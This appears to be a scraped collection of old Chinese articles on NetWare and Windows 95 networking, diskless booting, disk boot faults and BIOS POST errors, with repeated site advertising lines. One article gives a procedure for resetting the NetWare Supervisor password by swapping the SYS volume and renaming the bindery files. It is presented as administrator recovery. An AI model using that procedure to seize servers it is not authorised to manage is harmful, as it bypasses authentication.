    分两部分实施，一是建成Novell网络，把单位各处室30台微机联上Novell网，网络操作系统是Netware3．1250用户。这部分具体实现细节在此略过。二是计算中心10台机器的Windows95对等网络和Windows95站点上Novell专用网络。这部分是文章重点。请仔细阅读下面的网络实施步骤。
    【A】作为Novell网络工作站安装Windows95站点上网

    首先，在Novell网络服务器上设立供中心使用的10个帐户，且分配相应权限。
    其次，安装工作站硬件和工作站软件。
    1．关机，打开主机箱盖装网卡（NIC）。我们使用的是Ne2000系列兼容网卡，这样网卡驱动程序好找。
    2．开机，启动机器进入Windows95，安装网卡驱动程序（NDIS．VXD）。如果使用的网卡是即插即用（Plug＆Play），Windows95自动测出网卡，我们只要根据Windows95的网卡安装向导（SetupWizard）安装上网卡驱动程序。配置好网卡资源：IRQ、I／O地址、DMA号。若网卡资源与机器其它设备资源冲突，必须调整好各设备资源，这样才可使网卡正常工作。如果使用的网卡不支持即插即用功能，就需要手工安装了。方法：在ControlPanel选择AddHardware，选择添加硬件NetworkAdapter，然后按提示安装网卡附带驱动程序就可以了。
    3．选择安装传输协议。传输层协议主要作用是把自网络节点操作系统的数据转换成可由物理层网络（NDIS．VXD和NIC）识别的某种格式。由于这里是把Windows95作工作站联上Netware3．12网络操作系统，而Netware的传输协议是IPX／SPX，所以选择安装IPX／SPX传输协议。方法：ControlPanel双击Network图标，选择Configuration属性页，按Add按钮增加安装IPX／SPX传输协议后，按OK确认即可。
    4．选择安装网络重定向程序（器）ClientforNetwareNetworks。网络重定向程序的作用是把来自操作系统的请求重新分配给相应的网络处理软件处理。Windows95内含两种网络重定向器：ClientforMicrosoftNetworks，主要用于WindowsNT网络；ClientforNetwareNetworks，用于Novell网络。方法：ControlPanel双击Network图标，选择Configuration属性页，按Add按钮增加安装网络重定向器ClientforNetwareNetworks，按OK确认即可。
    最后，启动上网。以上安装各部过程后，不要忘记重启动Windows95让安装设置起作用。这样各Windows95站点就可以作Novell工作站实现对Novell网络的访问。
    【B】作为中心对等网络安装对等网络传输层协议与对等网络服务软件
    在前面安装基础上，只要安装适当软件即可实现对等服务功能。这些软件都可在Windows95光盘上找到。
    1．增加安装对等网络传输协议NETBEUI协议。这个传输协议能实现Windows95对等网络站点的信息传输。方法：ControlPanel双击Network图标，选择Configuration属性页，按Add按钮增加安装对等网络传输协议NETBEUI协议，按OK确认即可。
    2．增加安装对等网络对等服务printandfilesharingfornetwarenetworks。这种服务使各Windows95站点彼此相互共享文件、打印机、光驱等。方法：controlpanel双击network图标，选择configuration属性页，按add按钮增加安装对等网络对等服务printandfilesharingfornetwarenetworks，按ok确认即可。
    3．定义Windows95工作组。虽然Windows95工作组不过是用户的逻辑组织，并不提供实际物理组织或用户的分隔，任何工作组成员都潜在地通过网络共享资源或与其它任何工作的成员通信，但是，它提供了面向用户的资源组织方式的工具。Windows95工作组要求指明全局唯一的机器名称和所属工作组名字，另外可以附加机器描述。方法：ControlPanel双击Network图标，选择Identification属性页，在对应文本框输入ComputerName、Workgroup、ComputerDiscription，按OK确认即可。
    4．设置资源共享安全方式：共享级安全资源共享方式和用户级安全资源共享方式。Windows95对等网络资源在共享级安全机制下对所有对等网络用户权限一样，只有只读（ReadOnly）和全权（FullAccess）两种。Windows95对等网络资源在用户级安全机制下可以对不同的对等网络用户设置不同的权限，主要有：读、写、读且写、扫描、授权等。方法：ControlPanel双击Network图标，选择AccessControl属性页，选择按钮共享级安全或用户级安全。我们选择共享级安全，按OK确定即可。
    5．设置资源共享：设置共享资源类别和设置共享资源。共享资源类别有文件和打印机两大类，其实还包括其它外设，Windows95没有再详细划分。方法：ControlPanel双击Network图标，选择Configuration属性页，选择FileandPrintSharingforNetwareNetworks。按属性按钮，根据共享要求，可以选择文件共享，或打印机共享，或者两者皆选择。按OK确认即可。
    以上步骤设置，不要忘记启动机器使设置起作用。

返回


找回NOVELL网超级用户口令

《一键清理系统垃圾》

找回NOVELL网超级用户口令

    随着计算机网络化的发展，很多企事业单位和部门都组建了微机网络，其中Novell网占了很大的比重。在Novell网中，如果普通用户的口令忘记了，可以请求网络管理员以超级用户注册来更改普通用户的口令，但是如果因为网络管理不善，而使得超级用户的口令也忘记了，就无法再对系统进行更改和管理，而受托于超级用户的那些程序和数据也无法再存取，我们在工作中就曾遇到两例这种情况，那么有没有办法使得那些死掉的数据得到恢复，使网络恢复到受控状态，我们经过实践找到一个办法，希望能和同行共同商榷。
    1.仔细观察和了解现存网络系统有哪些用户，这些用户有哪些权限，能使用那些目录和文件，注册脚本是怎样的，记录在案。
    2.找一有盘工作站，把Login和Map两个命令的程序文件复制到工作站硬盘。
    3.找一块能接到网络服务器的有一定自由空间的硬盘并把它接到服务器上。
    4.以server －na命令启动网络操作系统，等待键入服务器名字和ipx内部网络号，如未加载新接硬盘驱动程序，用Load命令加载。
    5.用Load Install加载安装模块，选择卷操作菜单Volume Options，在卷名列表中选择系统卷sys，在卷状态一栏选择卸下卷Dismount Volume之后将光标移动到卷名Volume Name，然后回车，把卷名sys更改为sysbak(或其他不相重复的名字)。
    6.选择主菜单的磁盘操作菜单Disk Options，选择新接硬盘的名字，进行分区表操作，选择创建NetWare分区Create NetWare Partition，在新接硬盘的自由空间上创建——NetWare分区。回到主菜单，选择卷操作菜单Volume，按Insert键插入一新卷，在卷名处键入sys，其他栏目采用缺省值。
    7.用Mount All命令装载所有的卷。加载相应网卡驱动程序，用Bind命令把所用网络协议绑定到网卡。
    8.在有盘工作站执行联网软件，执行本地的Login命令，以用户Supervisor就可以注册进入网络，执行本地Map命令，将所有的卷映射为本地磁盘。至此所有服务器上死掉的数据就可以复制到有盘工作站。从而得到恢复。
    9.若要恢复系统控制，需重建超级用户，设原系统卷Sysbak映射为h:盘，在h:盘system目录下找到三个文件：net＄obj.sys、net＄prop.sys、net＄val.sys。改变文件属性，把他们更名为其他文件名，以备出现问题时进行恢复。
    10.在服务器控制台卸下卷，删除sys卷，把sysbak卷名字改回sys，关闭服务器，将刚才新增的硬盘卸下，重新启动服务器。
    11.在有盘工作站上重新注册，用户名为Supervisor，没有口令。注册进入后，将超级用户的口令设定，再将前面记录的用户重新创建上，设置好他们的受托目录和文件及注册脚本，有的用户的设置可能和原来不一致，可以逐步试验，直到满足实际应用为止。至此，整个网络已经恢复到受控状态。
    以上步骤在NetWare V3.11和312上操作通过。这并不表示NetWare网络操作系统的安全性有问题，这种方法本身是有一定限制的，它要求有服务器控制台的操作权，并有一台有盘工作站配合使用，当然它也不可能把网络完全恢复原样，只能是把损失降到最低限度。

返回


制作Win 95下NOVELL网络工作站

《一键清理系统垃圾》

返回总目录 上一页 目录页

制作Win 95下NOVELL网络工作站

NOVELL网络是DOS环境下的网络操作系统。通常网络软件可分为DOS和WINDOWS版软件，两个版本的软件因为汉字库的不同，在WINDOWS界面上是不能共容的，即DOS版软件在WINDOWS环境下不能使用。
    在WIN95环境下网络工作站可以解决DOS版与WINDOWS版软件不能共容的问题，也就是说WIN95能够兼容许多DOS版的网络软件，支持DOS版的网络软件的汉字显示。笔者单位建有DOS版的新闻稿件调阅网络系统和WINDOWS版的全文资料检索网络系统，以前两个系统不能在WIN32环境下共容，给用户的使用造成许多不便，有了WIN95工作站两者使用起来就很方便了。
    制作WIN95工作站，可能会遇到网卡冲突问题，必须有能力解决这些冲突才能保证正常上网操作。
    网卡有ISA型网卡和PCI型网卡，ISA型网卡属旧型网卡，在安装时会遇到地址和中断冲突问题，而PCI型网卡属新型网卡，在安装时则很方便。但因为需要更新环境的工作站往往都是ISA型网卡工作站，所以建立WIN95工作站时就要解决好冲突问题。
     一、冲突问题的解决方法（特指ISA型网卡）：
    1、不论是地址还是中断冲突都需要改变网卡的地址与中断来解决冲突，改变中断与地址就要根据所用网卡的具体情况来决定。
    2、ISA型网卡又分为只能在DOS环境设置地址与中断的网卡和在DOS、WIN95环境下均可设置地址与中断的网卡。例如：象NOVELL公司的NE2000网卡，就只能在DOS环境下设置地址与中断；又如：3COM公司的3C509型网卡，该网卡在DOS环境与WIN95环境下均可以进行设置网卡地址与中断。
     二、解决冲突的具体步骤（特指ISA型NOVELL公司的NE2000网卡）：
    1、首先在WIN95环境下，找出不发生冲突的网卡地址与中断（在WIN95环境下直接改变网卡地址与中断是不能真正改变网卡的实际使用地址与中断的，因此，冲突是不能解决的）。
    2、在DOS环境下使用网卡制造厂家提供的诊断与测试软件，将网卡地址与中断设置成不发生冲突的地址与中断，以解决冲突问题。
    3、在WIN95环境下将网卡地址与中断和DOS环境下设置好的网卡地址与中断等同。

返回


Novell

《一键清理系统垃圾》

返回总目录

Novell

◎NetWare 5安装技巧
◎NETWARE服务器随机存储器的扩展
◎Novell 4.11无盘Win95/98安装捷径
◎Novell Intranetware网故障记实
◎Novell NetWare控制台的安全保护
◎Novell的秘密武器
◎Novell纠错高招
◎Novell局域网常见问题解答
◎Novell局中装Windows 98
◎Novell网安全维护“三板斧”
◎Novell网故障三例的排除
◎Novell网快速克隆Windows 9x
◎Novell网如何防毒
◎Novell网上的电子邮件系统First Mail
◎Novell网特殊故障一例
◎NOVELL下的PWIN95无盘工作站
◎Novell自己如何利用NDS
◎NT的NetWare网关服务
◎Windows 95工作站如何进入Novell网
◎安装NT和Novell双操作系统的方法
◎安装双文件服务器
◎查Novell网络安全漏洞
◎NOVELL局域网上WEB的建立
◎实现NetWare网CD-ROM共享
◎谈Netware的远程控制台
◎谈Novell网和NT网混建
◎透视Novell的NDS(安全篇)
◎透视Novell的NDS（概念篇）
◎透视Novell的NDS（介绍篇）
◎透视Novell的NDS（特征篇）
◎透视Novell的NDS（需求篇）
◎透视Novell的NDS（应用篇）
◎一个不够，再来一个——用双服务器改造网络
◎用NetWare Lite实现简易对等网
◎用NetWare建立部子网
◎在NOVELL网络中实现Win 95对等网络服务功能
◎在Win NT平台上访问NetWare服务器
◎在网络服务器上安装Developer/2000
◎找回NOVELL网超级用户口令
◎制作Win 95下NOVELL网络工作站

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


硬盘不启动的故障、原因和处理

《一键清理系统垃圾》

返回总目录 目录页 下一页

硬盘不启动的故障、原因和处理

                                (一) 黑屏的故障
                                原因：连接硬盘一端的数据线插反(主板一端不可能插反)
                                处理：将其重插(数据线的红线与电源线的红线相邻)
                                (二) 显示"Primary master hard disk fail"的故障
                                原因：(1)硬盘数据线、电源线两者至少有一个没插好
                                (2)硬盘跳线设成从盘,而CMOS硬盘参数没做相应修改(仍然是主盘)
                                处理：(1)将其插牢
                                (2)重设CMOS
                                (三) 无提示信息的故障
                                原因：(1)CMOS硬盘参数的某些数值设置错误
                                (2)主引导记录错误或丢失
                                (3)主DOS引导记录第一个重要数据(每扇字节数)错误
                                (4)文件分配表错误
                                处理：(1)重设CMOS
                                (2)用FDISK/MBR命令恢复
                                (3)用DISKEDIT修复成512
                                具体步骤：用软盘启动电脑，以diskedit /w /m模式运行；按Alt+P，
                                将"面0"改为"面1"，确认；按F7以引导记录方式查看，将"每
                                扇字节数"一项的数值改成"512"。
                                (4)用DISKEDIT调用第二个分配表,再用NDD修复(下载网址见文尾)
                                具体步骤：用软盘启动电脑，运行diskedit；在"工具"下拉菜单
                                中选择"使用第二个FAT表"，退出diskedit；然后运行ndd，选择
                                "诊断磁盘"项，一步一步按提示操作，直到完成。
                                (四) 显示"DISK BOOT FAILURE,INSERT SYSTEM DISK AND
                                PRESS
                                ENTER"的故障 www.cnitt.net
                                原因：(1)硬盘，光驱连在同一条数据线上，且跳线都设成主盘(或都设成从盘)
                                (2)CMOS硬盘参数设成NONE
                                (3)主引导扇区结束标志55AAH错误
                                处理：(1)将光驱跳线设成从盘(或硬盘跳线设成主盘)
                                (2)重设CMOS
                                (3)用NDD的"诊断磁盘"修复
                                (五) 显示"Error Loading Operating System"的故障
                                原因：硬盘分区表中的活动分区标志80H被改成00H以外的其它数值(如被
                                改成FFH)
                                处理：用DISKEDIT修复为80H
                                具体步骤：用软盘启动电脑，以diskedit /m /w模式运行；按Alt+P，
                                不做任何修改，直接回车；按F2以16进制方式查看，把000001B0
                                地址行的倒数第二个16进制数值改为80。
                                (六) 显示"Not Found any [ative partition] in
                                HDD"的故障
                                原因：硬盘分配表中的活动分区标志80H被改成非活动分区标志00H
                                处理：用DISKEDIT修复为80H
                                具体步骤：同(五)
                                (七) 显示"Type the name of the command,Inter preter
                                ……"
                                原因：(1)硬盘分区表中的主DOS分区标志06H错误
                                (2)command.com丢失、损坏或与其它两个启动文件版本不同
                                处理：(1)用DISKEDIT修复为06H
                                具体步骤：用软盘启动电脑，以diskedit /m /w模式运行；按Alt+P，
                                不做任何修改，直接回车；按F2用16进制方式查看，把000001C0
                                地址行的第三个16进制数值改为06。
                                (2)用软盘中完好的command.com文件拷贝覆盖(注意版本要相同)
                                (八) DOS下输入d:回车(e:回车，f:回车)后显示"Invalid drive
                                specification"
                                (注：该现象并不影响硬盘启动，只作参考)
                                原因：(1)CMOS硬盘参数LBA被设成LARGE
                                (2)硬盘分区表中的非活动分区标志00H错误
                                (3)扩展DOS分区引导扇的部分数据错误
                                处理：(1)重设CMOS
                                (2)用DISKEDIT修复为00H
                                具体步骤：用软盘启动电脑，以diskedit /m /w模式运行，按Alt+P，
                                不做任何修改，直接回车；按F2用16进制方式查看，将000001C0地
                                址行的倒数第二个16进制数值改为00。
                                (3)用DISKEDIT修复
                                具体步骤：情况较复杂，需具体情况具体分析
                                (九) 显示"Invalid partition table"
                                原因：硬盘分区表部分数据错误
                                处理：用DISKEDIT修复
                                具体步骤：情况较复杂，需具体情况具体分析
                                (十) 显示"Disk I/O error ……"
                                原因：主DOS引导记录中物理硬盘标志号错误
                                处理：用DISKEDIT改成80H(第一个物理硬盘标志号)
                                具体步骤：用软盘启动电脑，以diskedit /m /w模式运行，按Alt+P，
                                将默认值改为：柱0面1扇1，确认；按F2用16进制方式查看，将00000020
                                地址行的第五个16进制数值改为80
                                (十一) 显示"Missing operating system"
                                原因：(1)硬盘分区表中的起始定位的三个数据错误
                                (2)主DOS引导扇区结束标志55AAH 错误
                                处理：(1)用DISKEDIT修复为1面0簇1扇
                                具体步骤：用软盘启动电脑，以diskedit /m /w模式运行，按Alt+P，
                                不做任何修改，直接回车；按F2用16进制方式查看，将000001C0地
                                址行的倒数第二个16进制数值改为00
                                (2)用DISKEDIT修复为55AAH
                                具体步骤：用软盘启动电脑，以diskedit /m /w模式运行，按Alt+P，
                                将默认值改为：柱0面1扇1，确认；将最后两个16进制数值改为55AA
                                (十二) 显示"Invalid system disk"
                                原因：io.sys文件不存在
                                处理：用软盘里完好的io.sys拷贝覆盖，或用sys c:命令传输(注意版本要相同)
                                (十三) 显示"Non-System disk or disk error"
                                原因：同(十二)
                                处理：同(十二)
                                (十四) 显示"Failure…"
                                原因：io.sys被改动
                                处理：同(十二)
                                做人要厚道，看贴要回贴


BIOS自检与开机故障相关问题

《一键清理系统垃圾》

BIOS自检与开机故障相关问题

[color=Red]什么是POST上电自检？

    POST上电自检：是微机接通电源后，系统进行的一个自我检查的例行程序。这个过程通常称为POST上电自检（Power On Self Test）。对系统的几乎所有的硬件进行检测。

POST是如何进行自检测的？

    主板在接通电源后，系统首先由(Power On Self Test,上电自检)程序来对内部各个设备进行检查。在我们按下起动键（电源开关）时，系统的控制权就交由BIOS来完成，由于此时电压还不稳定，主板控制芯片组会向CPU发出并保持一个RESET(重置)信号，让CPU初始化，同时等待电源发出的POWER　GOOD信号(电源准备好信号)。当电源开始稳定供电后(当然从不稳定到稳定的过程也只是短暂的瞬间)，芯片组便撤去RESET信号(如果是手动按下计算机面板上的Reset按钮来重启机器，那么松开该按钮时芯片组就会撤去RESET信号)，CPU马上就从地址FFFF0H处开始执行指令，这个地址在系统BIOS的地址范围内，无论是Award BIOS还是AMI BIOS，放在这里的只是一条跳转指令，跳到系统BIOS中真正的启动代码处。系统BIOS的启动代码首先要做的事情就是进行POST(Power On Self Test，加电自检)，由于电脑的硬件设备很多（包括存储器、中断、扩展卡），因此要检测这些设备的工作状态是否正常。

      这一过程是逐一进行的，BIOS厂商对每一个设备都给出了一个检测代码（称为POST CODE即开机自我检测代码），在对某个设置进行检测时，首先将对应的POST CODE写入80H（地址）诊断端口，当该设备检测通过，则接着送另一个设置的POST CODE，对此设置进行测试。如果某个设备测试没有通过，则此POST CODE会在80H处保留下来，检测程序也会中止，并根据已定的报警声进行报警（BIOS厂商对报警声也分别作了定义，不同的设置出现故障，其报警声也是不同的，我们可以根据报警声的不同，分辨出故障所在。

POST自检是按什么顺序进行检测的？

    POST自检测过程大致为：加电－CPU－ROM－BIOS－System Clock－DMA－64KB RAM－IRQ－显卡等。检测显卡以前的过程称过关键部件测试，如果关键部件有问题，计算机会处于挂起状态，习惯上称为核心故障。另一类故障称为非关键性故障，检测完显卡后，计算机将对64KB以上内存、I／O口、软硬盘驱动器、键盘、即插即用设备、CMOS设置等进行检测，并在屏幕上显示各种信息和出错报告。在正常情况下，POST过程进行得非常快，我们几乎无法感觉到这个过程。

POST自检测代码含义是什么？

    当系统检测到相应的错误时，会以两种方式进行报告，即在屏幕上显示出错信息或以报警声响次数的方式来指出检测到的故障。

CMOS battery failed（CMOS 电池失效）。

    原因：说明CMOS 电池的电力已经不足，请更换新的电池。

    CMOS check sum error－Defaults loaded（CMOS 执行全部检查时发现错误，因此载入预设的系统设定值）。

    原因：通常发生这种状况都是因为电池电力不足所造成，所以不妨先换个电池试试看。如果问题依然存在的话，那就说明 CMOS RAM 可能有问题，最好送回原厂处理。

    Display switch is set incorrectly（显示开关配置错误）。

    原因：较旧型的主板上有跳线可设定显示器为单色或彩色，而这个错误提示表示主板上的设定和 BIOS 里的设定不一致，重新设定即可。

    Press ESC to skip memory test（内存检查，可按ESC键跳过）。

    原因：如果在 BIOS 内并没有设定快速加电自检的话，那么开机就会执行内存的测试，如果你不想等待，可按 ESC 键跳过或到 BIOS 内开启 Quick Power On Self Test。

    HARD DISK initializing【Please wait a moment...】（硬盘正在初始化 请等待片刻）。

    原因：这种问题在较新的硬盘上根本看不到。但在较旧的硬盘上，其启动较慢，所以就会出现这个问题。

    HARD DISK INSTALL FAILURE （硬盘安装失败）。

    原因：硬盘的电源线、数据线可能未接好或者硬盘跳线不当出错误 ( 例如一根数据线上的两个硬盘都设为 Master 或 Slave。)

    Secondary slave hard fail （检测从盘失败）。

    原因：1 CMOS 设置不当（例如没有从盘但在CMOS里设有从盘）　2 硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当。

    Hard disk(s) diagnosis fail (执行硬盘诊断时发生错误)。

    原因：这通常代表硬盘本身的故障。你可以先把硬盘接到另一台电脑上试一下，如果问题一样，那只好送修了。

Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)（无法驱动软驱）。

    原因：软驱的排线是否接错或松脱？电源线有没有接好？如果这些都没问题，那买个新的吧。

    Keyboard error or no keyboard present(键盘错误或者未接键盘)

    原因：键盘连接线是否插好？连接线是否损坏？

    Memory test fail (内存检测失败)

    原因：通常是因为内存不兼容或故障所导致。

    Override enable－Defaults loaded ( 当前CMOS设定无法启动系统，载入 BIOS 预设值以启动系统)。

    原因：可能是你在BIOS内的设定并不适合你的电脑( 像你的内存只能跑100MHz但你让它跑133MHz )，这时进入 BIOS 设定重新调整即可。

    Press TAB to show POST screen (按 TAB 键 可以切换屏幕显示)

    原因：有一些 OEM 厂商会以自己设计的显示画面来取代 BIOS 预设的开机显示画面，而此提示就是要告诉使用者可以按TAB来把厂商的自定义画面和BIOS预设的开机画面进行切换。

    Resuming from disk，Press TAB to show POST screen（从硬盘恢复开机，按TAB显示开机自检画面）。

    原因：某些主板的BIOS 提供了 Suspend to disk(挂起到硬盘)的功能，当使用者以 Suspend to disk 的方式来关机时，那么在下次开机时就会显示此提示消息。

    BIOS ROM checksum error-System halted(BIOS 程序代码在进行总和检查 ( checksum ) 时发现错误，因此无法开机)

    原因：遇到这种问题通常是因为 BIOS 程序代码更新不完全所造成的，解决办法重新刷写烧坏主板 BIOS。

    HARD DISK initizlizing 【Please wait a moment...】(正在对硬盘做起始化 ( Initizlize ) 动作)

    原因：这种讯息在较新的硬盘上根本看不到。但在较旧型的硬盘上，其动作因为较慢，所以就会看到这个讯


Boot Easy惹麻烦

《一键清理系统垃圾》

Boot Easy惹麻烦

《中国电脑教育报》mzhko

    一日，朋友打来电话求救，说他的爱机无法进入系统，重新启动多次都是在能源之星画面停滞，无法通过自检，希望我能够帮忙。

    朋友的爱机是QDI 815EP主板、赛扬800MHz CPU、现代128MB内存、IBM 40GB硬盘以及三星753DF 17英寸彩显。打开朋友的爱机，发现确实无法通过自检，系统提示硬盘检测错误。重新启动计算机，按键盘上的“Delete”键进入主板的BIOS，发现硬盘检测为120GB，手动调整后问题依旧。正当无奈之际，忽然想到QDI主板有一个Boot Easy功能，此功能可以在计算机第一次启动时记录下自检信息，以后启动计算机时就可以免去自检过程，从而提高开机速度。于是怀疑朋友可能近日更换过硬盘，但没让Boot Easy功能重新记录自检信息。询问之下果然如此。找到了问题的根源，解决起来就十分容易了，给主板的BIOS放了一下电，让Boot Easy功能重新记录自检信息，故障就此排除。


Novell网上远程启动Win95(有盘）

《一键清理系统垃圾》

Novell网上远程启动Win95(有盘）

    基于Windows NT的局域网中，以无盘工作站启动Win95这一技术已渐为人知。但在Novell网中（特别是操作系统为Netware4.1以上的Novell网），以无盘工作站远程启动Win95的技术却鲜为人知。现将这一技术的有关资料和细节公布如下，供大家参考。
网络配置：
    网络类型：总线型
    服务器：一台P200/32M/4.0G硬盘/PCI/NE2000兼容网卡，Netware4.1网络操作系统
    有盘工作站：一台P200MMX/2.0G硬盘/32M/ISA/NE2000兼容网卡/1.44M软驱，Win95操作系统
    无盘工作站：20台K5/133/8M/ISA/NE2000兼容网卡
    其它：五类双绞线，16口集线器两台（每台集线器连接10台无盘工作站），网络带宽10Mbps
服务器设置：
    服务器名：CEI
    硬盘划分为两个卷：系统卷SYS和数据卷HOME
    现存的CONTEXT：OU=STUDENT.O=HXX_WJS
    用户注册正本内容：
    MAP DISPLAY OFF
    MAP F:=SYS:\
    MAP H:=HOME:\
    SET COMSPEC=F:\LOGIN\COMMAND.COM
    MAP INS S1:=SYS:\LOGIN
    MAP INS S2:=SYS:\PUBLIC
    NET.CFG 内容：
    LINK DRIVE NE2000
    INT 3
    PORT 300
    FRAME ETHERNET_802.3
    NETWORK DOS REQUESTER
    FIRST NETWORK DRIVE=F
操作步骤：
    步骤一　安装Win95网络版并创建安装文件
    1.在Win95中将服务器CEI上的HOME卷映射为H，然后将Win95光碟放入光驱开始安装，指定安装目录为H:\PWin95。安装完成后，Win95网络版共享文件（UNC格式）将存放于服务器的H:\PWIN95下。
    2.以超级用户身份登录上网，在H:\PWIN95下为Win95文件设置只读和共享属性：FLAG ＊.＊ ＋RO ＋SH /S，用文本编辑器建立MSBATCH.INF文件，该文件即为安装网络版Win95用户文件时需要的批处理文件。
    MSBATCH.INF内容：
    [SETUP]
    EXPRESS=0
    VERIFY=0
    CCP=0
    INSTALLTYPE=3
    PRODUCTID=
    PRODUCTTYPE=1
    UNINSTALL=0
    [NETWORK]
    WORKSTATIONSETUP=1
    DISPLAYWORKSTATIONSETUP=1
    DISPLAY=1
    HDBOOT=0
    RPLSETUP=0
    SAVESUBOOT=1
    步骤二　上网安装Win95用户文件前的准备
    1.首先制作一张DOS6.22系统盘，再将Netware4.1客户上网文件拷贝到A盘，完成后A盘应包括以下文件：BIND.VLM、AUTO.VLM、LSL.COM、IPXODI.COM、NE2000.COM、NET.CFG、VLM.EXE、CONFIG.SYS、AUTOEXEC.BAT、HIMEM.SYS、EMM386.EXE。
    2.启动计算机并以超级用户身份上网。为避免不必要的冲突，先使用NETADMIN为Win95用户建立一个独立的组织单元OU=WINUSER，并建立Win95用户USER1；赋予用户USER1对H:\PWIN95拥有RF权限；在H:\建立Win95用户目录WINUSER\USER1，赋予用户USER1对该目录拥有RWCM权限；在H:\建立Win95用户数据存放目录WINDATA\USER1，赋予用户USER1对该目录拥有S权限。然后修改用户注册正本：
    MAP DISPLAY OFF
    MAP F:=SYS:\
    MAP H:=HOME:\
    MAP R K:=HOME:\STUDENT\LOGIN_NAME
    >>MAP R P:=HOME:\WINDATA\LOGIN_NAME
    >>SET COMSPEC=C:\COMMAND.COM
    MAP INS S1:=SYS:\LOGIN
    MAP INS S2:=SYS:\PUBLIC
    >>MAP INS S3:=HOME:\PWin95
    >>MAP INS S4:=HOME:\WINUSER\USER1
    >>MAP INS S5:=HOME:\WINUSER\USER1\SUBOOT
    （注：带“>>”行为被修改项，下同）
    步骤三　安装Win95用户文件
    用上面制作的软盘启动计算机并以超级用户身份上网，在DOS状态下键入MAP INS S2=H:\PWIN95，也可在注册正本中先行映射。然后在H:\PWIN95下键入SETUP MSBATCH.INF /T：H：\WINUSER\USER\TEMP /S /I。
    在程序提示输入安装路径时键入H:\WINUSER\USER1（用户文件存放目录）；在系统提示即将搜索即插即用设备时，选择“更新文件列表”并取消所有硬件搜索选项；在选择网卡型号时选择NE2000兼容网卡并添加IPX/SPX协议。之后，插入一张空白软盘以制作Win95启动盘，完成后请不要重新启动，先将制作好的启动盘在其它计算机上复制一份并将源盘妥善保存，在另一台计算机上对复制的启动盘作一些改动：将Win95的COUNTRY.SYS和RAMDRIVE.SYS拷贝到A:\ ，并编辑A:\AUTOEXEC.BAT和A:\CONFIG.SYS文件，改动后的AUTOEXEC.BAT：
    @ECHO OFF
    >>COPY COMMAND.COM C:\ >>NUL
    >>SET COMSPEC=C:\COMMAND.COM
    LH LSL
    LH NE2000(网卡驱动程序)
    LH IPXODI
    >>COPY ＊.VLM C:\ >>NUL
    >>COPY VLM.EXE C:\ >>NUL
    >>C：
    >>VLM /MC(将VLM模块调入常规内存)
    F：
    CX OU=WINUSER.O=HXX_WJS
    LOGIN USER1
    改动后的CONFIG.SYS
    >>DEVICE=COUNTRY.SYS，001，437，A:\COUNTRY.SYS
    DEVICE=HIMEM.SYS
    >>DEVICE=EMM386.EXE
    >>DEVICE=RAMDRIVE 300 256 512 /A
    LASTDRIVE=Z
    >>FILES=100
    步骤四　进行Win95的最后安装工作
    回到安装Win95的计算机上，用上面制作的软盘重新启动计算机，用USER1身份上网，Win95将会继续安装用户配置文件，安装完成后，重新启动计算机，按F8进入DOS状态，以超级用户身份上网进入H:\WINUSER\USER1后键入：
    ATTRIB ＊.DAT －S －R －H
    ATTRIB A:\＊.＊ －S －R －H
    COPY SYSTEM.DAT A:\
    然后建立目录F:\WINBOOT，拷贝A盘上的所有文件到F:\WINBOOT目录，修改用户注册正本，将A盘根目录映射为F:\WINBOOT目录（MAP R A:=SYS:\WINBOOT）。
    重新启动计算机以用户USER1身份上网进入Win95完成软盘启动。
    注意：完成软盘启动后，为保险起见，先将用户目录WINUSER中的Win95系统文件SYSTEM.DAT和USER.DAT作一备份,并将安装完成后H:\WINUSER\SYSTEM.DAT和USER.DAT拷贝至启动盘A:\，以后要安装新的应用程序则要由超级用户从软盘启动进入Win95安装，然后将改变后的＊.DAT拷贝到A:\并用该软盘重新生成无盘启动映像文件。
    步骤五　建立远程启动映像文件
    用启动盘重新启动计算机，以超级用户身份上网。进入SYS:\SYSTEM生成Win95远程启动映像文件：DOSGEN A：WIN95.SYS；为远程启动映像文件加共享属性：FLAG WIN95.SYS ＋SH；复制WIN95.SYS到F:\LOGIN目录下：F:\SYSTEM\COPY WIN95.SYS F:\LOGIN；进入F:\LOGIN编辑AUTOCONF.SYS，指定工作站网络地址：
    F:\SYSTEM\CD..\LOGIN
    F:\LOGIN\EDIT AUTOCONF.SYS
    AUTOCONF.SYS内容：
    0x87654321,88cc104001=WIN95.SYS
    0x87654321,88cc103803=WIN95.SYS
    其中0x87654321为内部网络号，88cc104001为工作站网址。
    完成以上工作后再进入H:\PWIN95，修改SYSTEM.INI，在[386增强方式]一项中将PAGIN
GFILE=H:\WINUSER\USER1\WIN386.SWP改为PAGINGFILE=P:\WIN386.SWP。
    重新启动无盘工作站以用户USER1身份上网即完成所有安装工作。

返回


NOVELL网无盘启动WIN95进阶

《一键清理系统垃圾》

NOVELL网无盘启动WIN95进阶

    与 Windows NT 网中无盘启动 Windows 95 相比,在 NOVELL网中 (NetWare 3.12 版本以上) 实现无盘启动Windows95要简单得多,此类文章已有介绍,故不再赘述,须注意的是,安装过程中有些步骤得特别小心,若有一小点的差错,屏幕上出现的将不是令人向往的 Windows桌面,而是一行行的错误提示,实在让人头痛。
    现将笔者在安装过程中的一点经验介绍给大家,希望对大家有所帮助。
    1.NOVELL 网中无盘工作站启动 Windows 95 有两种模式:实模式和保护模式。所谓实模式即先运行一些基于 DOS 的网络软件连上服务器后,再进入 Windows 95 (此方法《电脑报》1998年第39期有介绍),而保护模式则是直接运行 Windows 95 的内置连网软件以保护方式连上服务器进入 Windows 95 。建议你使用保护模式运行 Windows 95 ,因为只有在保护模式下才能充分利用 Windows 95 的独特功能，且安装方法也比实模式要简单得多。(此方法《电脑报》1998年第48期中有介绍)
    2.服务器最好使用 NetWare 4.11 版本以上,因为此版本提供对长文件名的支持及 TCP／IP 协议等功能,使以后的维护工作更加方便快捷。
    3.服务器中一定要加入长文件名支持,以便让那些基于在Windows 95上运行的软件能正常工作,具体方法如下:
     a.在NetWare 3.1x ,4.10 服务器控制台键入
    load os2
    add name space os2 to sys (sys 为卷名)
    然后将“load os2”此句加到Autoexec.ncf中
    b.在NetWare 4.11服务器的控制台键入:
    load long
    add name space long to sys
    (或采用a项的方法)
    4.安装 Windows 95 共享文件需一台能正常运行Windows 95的有盘工作站,在此工作站中，最好采用 NOVELL 公司提供的NetWare Client32 For Win95 客户软件来登录服务器进行安装。
